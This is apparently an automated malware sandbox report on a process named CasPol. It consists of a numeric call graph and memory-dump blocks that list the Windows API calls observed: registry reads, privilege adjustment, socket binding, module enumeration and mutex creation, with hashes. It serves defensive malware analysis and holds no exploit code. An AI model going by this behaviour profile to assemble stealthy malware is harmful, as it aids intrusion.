API calls 39308->39317 39318 204555cb 4 API calls 39308->39318 39309->38743 39310->39308 39311->39308 39312->39308 39313->39308 39314->39309 39315->39309 39316->39309 39317->39309 39318->39309 39320 1f9c3bf4 39319->39320 39321 1f9c44a7 39320->39321 39323 20452950 4 API calls 39320->39323 39324 20452c0d 4 API calls 39320->39324 39325 20452cdf 4 API calls 39320->39325 39326 204529a8 4 API calls 39320->39326 39322 1f9c44f2 39321->39322 39327 204548a0 4 API calls 39321->39327 39328 20454460 4 API calls 39321->39328 39329 2045444f 4 API calls 39321->39329 39330 204550d8 4 API calls 39321->39330 39331 204555cb 4 API calls 39321->39331 39322->38743 39323->39321 39324->39321 39325->39321 39326->39321 39327->39322 39328->39322 39329->39322 39330->39322 
39331->39322 39333 1f9c3af8 39332->39333 39334 1f9c44a7 39333->39334 39336 20452950 4 API calls 39333->39336 39337 20452c0d 4 API calls 39333->39337 39338 20452cdf 4 API calls 39333->39338 39339 204529a8 4 API calls 39333->39339 39335 1f9c44f2 39334->39335 39340 204548a0 4 API calls 39334->39340 39341 20454460 4 API calls 39334->39341 39342 2045444f 4 API calls 39334->39342 39343 204550d8 4 API calls 39334->39343 39344 204555cb 4 API calls 39334->39344 39335->38743 39336->39334 39337->39334 39338->39334 39339->39334 39340->39335 39341->39335 39342->39335 39343->39335 39344->39335 39346 1f9c3678 39345->39346 39347 1f9c44a7 39346->39347 39349 20452950 4 API calls 39346->39349 39350 20452c0d 4 API calls 39346->39350 39351 20452cdf 4 API calls 39346->39351 39352 204529a8 4 API calls 39346->39352 39348 1f9c44f2 39347->39348 39353 204548a0 4 API calls 39347->39353 39354 20454460 4 API calls 39347->39354 39355 2045444f 4 API calls 39347->39355 39356 204550d8 4 API calls 39347->39356 39357 204555cb 4 API calls 39347->39357 39348->38743 39349->39347 39350->39347 39351->39347 39352->39347 39353->39348 39354->39348 39355->39348 39356->39348 39357->39348 39359 1f9c4083 39358->39359 39360 1f9c44a7 39359->39360 39362 20452950 4 API calls 39359->39362 39363 20452c0d 4 API calls 39359->39363 39364 20452cdf 4 API calls 39359->39364 39365 204529a8 4 API calls 39359->39365 39361 1f9c44f2 39360->39361 39366 204548a0 4 API calls 39360->39366 39367 20454460 4 API calls 39360->39367 39368 2045444f 4 API calls 39360->39368 39369 204550d8 4 API calls 39360->39369 39370 204555cb 4 API calls 39360->39370 39361->38743 39362->39360 39363->39360 39364->39360 39365->39360 39366->39361 39367->39361 39368->39361 39369->39361 39370->39361 39372 1f9c4188 39371->39372 39373 1f9c44a7 39372->39373 39374 20452950 4 API calls 39372->39374 39375 20452c0d 4 API calls 39372->39375 39376 20452cdf 4 API calls 39372->39376 39377 204529a8 4 API calls 39372->39377 39378 1f9c44f2 39373->39378 39379 204548a0 4 API 
calls 39373->39379 39380 20454460 4 API calls 39373->39380 39381 2045444f 4 API calls 39373->39381 39382 204550d8 4 API calls 39373->39382 39383 204555cb 4 API calls 39373->39383 39374->39373 39375->39373 39376->39373 39377->39373 39378->38743 39379->39378 39380->39378 39381->39378 39382->39378 39383->39378 39385 1f9c3906 39384->39385 39386 1f9c44a7 39385->39386 39388 20452950 4 API calls 39385->39388 39389 20452c0d 4 API calls 39385->39389 39390 20452cdf 4 API calls 39385->39390 39391 204529a8 4 API calls 39385->39391 39387 1f9c44f2 39386->39387 39392 204548a0 4 API calls 39386->39392 39393 20454460 4 API calls 39386->39393 39394 2045444f 4 API calls 39386->39394 39395 204550d8 4 API calls 39386->39395 39396 204555cb 4 API calls 39386->39396 39387->38743 39388->39386 39389->39386 39390->39386 39391->39386 39392->39387 39393->39387 39394->39387 39395->39387 39396->39387 39398 20452969 39397->39398 39400 2045298c 39397->39400 39398->38793 39399 20452cca 39400->39399 39405 204548a0 4 API calls 39400->39405 39406 20454460 4 API calls 39400->39406 39407 2045444f 4 API calls 39400->39407 39408 204550d8 4 API calls 39400->39408 39409 204555cb 4 API calls 39400->39409 39527 20453b24 39400->39527 39532 20453800 39400->39532 39537 20453b40 39400->39537 39543 20453b88 39400->39543 39405->39400 39406->39400 39407->39400 39408->39400 39409->39400 39412 204529cc 39410->39412 39411 20452cca 39412->39411 39413 204548a0 4 API calls 39412->39413 39414 20454460 4 API calls 39412->39414 39415 2045444f 4 API calls 39412->39415 39416 204550d8 4 API calls 39412->39416 39417 204555cb 4 API calls 39412->39417 39418 20453b24 4 API calls 39412->39418 39419 20453800 4 API calls 39412->39419 39420 20453b40 4 API calls 39412->39420 39421 20453b88 4 API calls 39412->39421 39413->39412 39414->39412 39415->39412 39416->39412 39417->39412 39418->39412 39419->39412 39420->39412 39421->39412 39424 20452ac0 39422->39424 39423 20452cca 39424->39423 39425 204548a0 4 API calls 39424->39425 39426 
20454460 4 API calls 39424->39426 39427 2045444f 4 API calls 39424->39427 39428 204550d8 4 API calls 39424->39428 39429 204555cb 4 API calls 39424->39429 39430 20453b24 4 API calls 39424->39430 39431 20453800 4 API calls 39424->39431 39432 20453b40 4 API calls 39424->39432 39433 20453b88 4 API calls 39424->39433 39425->39424 39426->39424 39427->39424 39428->39424 39429->39424 39430->39424 39431->39424 39432->39424 39433->39424 39435 20452cca 39434->39435 39436 20452ac0 39434->39436 39436->39435 39437 204548a0 4 API calls 39436->39437 39438 20454460 4 API calls 39436->39438 39439 2045444f 4 API calls 39436->39439 39440 204550d8 4 API calls 39436->39440 39441 204555cb 4 API calls 39436->39441 39442 20453b24 4 API calls 39436->39442 39443 20453800 4 API calls 39436->39443 39444 20453b40 4 API calls 39436->39444 39445 20453b88 4 API calls 39436->39445 39437->39436 39438->39436 39439->39436 39440->39436 39441->39436 39442->39436 39443->39436 39444->39436 39445->39436 39447 204550e6 39446->39447 39448 20455109 39446->39448 39447->38794 39449 204550d8 4 API calls 39448->39449 39450 20455149 39449->39450 39451 20454460 4 API calls 39450->39451 39452 204551f1 39450->39452 39453 20455245 39451->39453 39452->38794 39454 204553b3 39453->39454 39455 10e474a RegQueryValueExW 39453->39455 39456 10e4707 RegQueryValueExW 39453->39456 39549 10e461e 39453->39549 39553 10e463e 39453->39553 39454->38794 39455->39453 39456->39453 39460 2045446e 39459->39460 39462 20454491 39459->39462 39460->38794 39461 204548b1 39461->38794 39464 2045456e 39462->39464 39468 20454883 39462->39468 39478 204548a0 4 API calls 39462->39478 39479 20454460 4 API calls 39462->39479 39480 2045444f 4 API calls 39462->39480 39463 20453b88 4 API calls 39463->39468 39464->38794 39465 20454ee7 39465->38794 39466 20454ecf 39466->39465 39467 204550d8 4 API calls 39466->39467 39469 20455149 39467->39469 39468->39461 39468->39463 39468->39466 39470 20454460 4 API calls 39469->39470 39471 204551f1 39469->39471 39472 
20455245 39470->39472 39471->38794 39473 204553b3 39472->39473 39474 10e461e RegOpenKeyExW 39472->39474 39475 10e463e RegOpenKeyExW 39472->39475 39476 10e474a RegQueryValueExW 39472->39476 39477 10e4707 RegQueryValueExW 39472->39477 39473->38794 39474->39472 39475->39472 39476->39472 39477->39472 39478->39462 39479->39462 39480->39462 39482 2045446e 39481->39482 39483 20454491 39481->39483 39482->38794 39484 2045456e 39483->39484 39490 20454883 39483->39490 39496 204548a0 4 API calls 39483->39496 39497 20454460 4 API calls 39483->39497 39498 2045444f 4 API calls 39483->39498 39484->38794 39485 20453b88 4 API calls 39485->39490 39486 204548b1 39486->38794 39487 20454ee7 39487->38794 39488 20454ecf 39488->39487 39489 204550d8 4 API calls 39488->39489 39491 20455149 39489->39491 39490->39485 39490->39486 39490->39488 39492 20454460 4 API calls 39491->39492 39493 204551f1 39491->39493 39494 20455245 39492->39494 39493->38794 39495 204553b3 39494->39495 39499 10e461e RegOpenKeyExW 39494->39499 39500 10e463e RegOpenKeyExW 39494->39500 39501 10e4707 RegQueryValueExW 39494->39501 39502 10e474a RegQueryValueExW 39494->39502 39495->38794 39496->39483 39497->39483 39498->39483 39499->39494 39500->39494 39501->39494 39502->39494 39505 204555e5 39503->39505 39504 204556e5 39504->38794 39505->39504 39506 10e474a RegQueryValueExW 39505->39506 39507 10e4707 RegQueryValueExW 39505->39507 39508 10e461e RegOpenKeyExW 39505->39508 39509 10e463e RegOpenKeyExW 39505->39509 39506->39505 39507->39505 39508->39505 39509->39505 39511 204548b1 39510->39511 39517 20454895 39510->39517 39511->38794 39512 20453b88 4 API calls 39512->39517 39513 20454b2a 39513->38794 39514 20454ee7 39514->38794 39515 20454ecf 39515->39514 39516 204550d8 4 API calls 39515->39516 39518 20455149 39516->39518 39517->39510 39517->39512 39517->39513 39517->39515 39519 20454460 4 API calls 39518->39519 39520 204551f1 39518->39520 39521 20455245 39519->39521 39520->38794 39522 204553b3 39521->39522 39523 10e461e 
RegOpenKeyExW 39521->39523 39524 10e463e RegOpenKeyExW 39521->39524 39525 10e474a RegQueryValueExW 39521->39525 39526 10e4707 RegQueryValueExW 39521->39526 39522->38794 39523->39521 39524->39521 39525->39521 39526->39521 39528 20453b2a 39527->39528 39529 20453b4e 39528->39529 39530 20454460 4 API calls 39528->39530 39531 2045444f 4 API calls 39528->39531 39529->39400 39530->39529 39531->39529 39534 20453837 39532->39534 39533 20453b4e 39533->39400 39534->39533 39535 20454460 4 API calls 39534->39535 39536 2045444f 4 API calls 39534->39536 39535->39533 39536->39533 39538 20453b4e 39537->39538 39539 20453b71 39537->39539 39538->39400 39540 20453b96 39539->39540 39541 20454460 4 API calls 39539->39541 39542 2045444f 4 API calls 39539->39542 39540->39400 39541->39540 39542->39540 39544 20453b96 39543->39544 39545 20453bb9 39543->39545 39544->39400 39546 20453c51 39545->39546 39547 20454460 4 API calls 39545->39547 39548 2045444f 4 API calls 39545->39548 39546->39400 39547->39546 39548->39546 39550 10e463e RegOpenKeyExW 39549->39550 39552 10e46ba 39550->39552 39552->39453 39554 10e4676 RegOpenKeyExW 39553->39554 39556 10e46ba 39554->39556 39556->39453 39557 1d5faf32 39558 1d5faf82 K32GetModuleBaseNameW 39557->39558 39559 1d5faf8a 39558->39559 39560 10e1b7e 39561 10e1bce CertGetCertificateChain 39560->39561 39562 10e1bd6 39561->39562 39563 10e187e 39565 10e18b3 GetProcessTimes 39563->39565 39566 10e18e5 39565->39566 39567 10e4a7a 39568 10e4aaf bind 39567->39568 39570 10e4ae3 39568->39570 39571 1d5fad2a 39574 1d5fad5f K32EnumProcessModules 39571->39574 39573 1d5fad8e 39574->39573
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr$d$d
                                  • API String ID: 0-3342231519
                                  • Opcode ID: 55d2919a72701e6c082a9ebae0f4babcb4fd5bab0128194d84ed3e74049c30ff
                                  • Instruction ID: a6224c762d0bc921b0c27cb2d24d1ad34fdba35e3bc47caafca83073eadf634a
                                  • Opcode Fuzzy Hash: 55d2919a72701e6c082a9ebae0f4babcb4fd5bab0128194d84ed3e74049c30ff
                                  • Instruction Fuzzy Hash: 4213C475D00A299FDB65CFA8C844A89F7F2BF88300F1581E6D90CAB225D775AE85CF41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr$:@zr$:@zr
                                  • API String ID: 0-397697517
                                  • Opcode ID: 58d888a5cd26b9b5a56d7e8eab5fd6a9b7ef6f890262c94e8b93a5215fe19c59
                                  • Instruction ID: 42cff8ddfbe6f296c78c77e782cb926d702f8352964e7c60d27c50d323d4295f
                                  • Opcode Fuzzy Hash: 58d888a5cd26b9b5a56d7e8eab5fd6a9b7ef6f890262c94e8b93a5215fe19c59
                                  • Instruction Fuzzy Hash: 4EA23770E012289FDB58DBB9C854B9EB7F2AF85304F1581A9D509EB3A1EB349D81CF41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D5FAAFF
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • bind.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E4ADB
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: bind
                                  • String ID:
                                  • API String ID: 1187836755-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • bind.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E4ADB
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: bind
                                  • String ID:
                                  • API String ID: 1187836755-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtQuerySystemInformation.NTDLL ref: 1D5FB241
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: InformationQuerySystem
                                  • String ID:
                                  • API String ID: 3562636166-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D5FAAFF
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtQuerySystemInformation.NTDLL ref: 1D5FB241
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: InformationQuerySystem
                                  • String ID:
                                  • API String ID: 3562636166-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr$:@zr$:@zr$:@zr
                                  • API String ID: 0-3804113890
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr$:@zr
                                  • API String ID: 0-3404669453
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: :@zr
                                  • API String ID: 0-2777926517
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetTempFileNameW.KERNEL32(?,00000EA4,?,?), ref: 010E2476
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileNameTemp
                                  • String ID:
                                  • API String ID: 745986568-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 010E08A9
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • getaddrinfo.WS2_32(?,00000EA4), ref: 010E28AB
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: getaddrinfo
                                  • String ID:
                                  • API String ID: 300660673-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 010E1F45
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 010E0DB6
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Socket
                                  • String ID:
                                  • API String ID: 38366605-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CertGetCertificateChain.CRYPT32(?,00000EA4,?,?), ref: 010E1BCE
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CertCertificateChain
                                  • String ID:
                                  • API String ID: 3019455780-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E47BC
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WSAIoctl.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1AC1
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Ioctl
                                  • String ID:
                                  • API String ID: 3041054344-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 010E213A
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 1D5FA5C9
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FA6CC
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • K32EnumProcessModules.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FAD86
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: EnumModulesProcess
                                  • String ID:
                                  • API String ID: 1082081703-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: FileView
                                  • String ID:
                                  • API String ID: 3314676101-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E10D8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RasEnumConnectionsW.RASAPI32(?,00000EA4,?,?), ref: 010E0CDA
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ConnectionsEnum
                                  • String ID:
                                  • API String ID: 3832085198-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegEnumKeyExW.KERNEL32(?,00000EA4,?,?), ref: 010E45F2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Enum
                                  • String ID:
                                  • API String ID: 2928410991-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateMutexW.KERNEL32(?,?), ref: 010E1719
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • getaddrinfo.WS2_32(?,00000EA4), ref: 010E28AB
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: getaddrinfo
                                  • String ID:
                                  • API String ID: 300660673-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegNotifyChangeKeyValue.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E2044
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: ChangeNotifyValue
                                  • String ID:
                                  • API String ID: 3933585183-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenCurrentUser.KERNEL32(?,00000EA4), ref: 010E1E39
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: CurrentOpenUser
                                  • String ID:
                                  • API String ID: 1571386571-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EA4), ref: 010E46B2
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • K32GetModuleInformation.KERNEL32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 1D5FAE76
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: InformationModule
                                  • String ID:
                                  • API String ID: 3425974696-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • shutdown.WS2_32(?,00000EA4,C151FFB0,00000000,00000000,00000000,00000000), ref: 010E1804
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5812076471.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_10e0000_CasPol.jbxd
                                  Similarity
                                  • API ID: shutdown
                                  • String ID:
                                  • API String ID: 2510479042-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • K32GetModuleBaseNameW.KERNEL32(?,00000EA4,?,?), ref: 1D5FAF82
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5851794079.000000001D5FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5FA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1d5fa000_CasPol.jbxd
                                  Similarity
                                  • API ID: BaseModuleName
                                  • String ID:
                                  • API String ID: 595626670-0
                                  Uniqueness

